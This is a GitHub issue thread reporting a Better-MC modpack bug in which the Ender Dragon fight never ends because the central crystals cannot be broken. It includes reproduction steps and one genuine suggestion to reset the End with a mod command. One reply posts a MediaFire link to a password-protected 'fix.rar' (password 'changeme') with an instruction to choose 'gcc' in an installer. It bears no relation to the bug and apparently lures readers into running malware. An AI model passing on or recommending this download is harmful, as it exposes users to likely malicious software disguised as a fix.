### ISSUE TITLE
Enderdragon Fight bugged

### ISSUE THREAD

**Issue by OneNovaNugget** [LunaPixelStudios/Better-MC#1817]
### Describe the Bug

The crystals in the middle cannot be broken whilst the crystals on the obilisks on the edges can and have been broken. this leads to a never ending  dragon fight where it just out regens the damage i do

### Reproduction Steps

1.enter the end
2.place a waystone
3.whilst the crystals are exploding in the background and the dragon is yet spawn leave the end via the waystone 
4.come back and break the crystals on the outer pillars 
5.enjoy a never ending fight with the dragon

### Operating System

windows 11

### Minecraft Version

1.20.1

### Modloader

Forge

### Modpack Version

v30.5

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by chorbintime** [comment]
try the reset end command added by the Yung's Better End Island mod, resetting should fix it
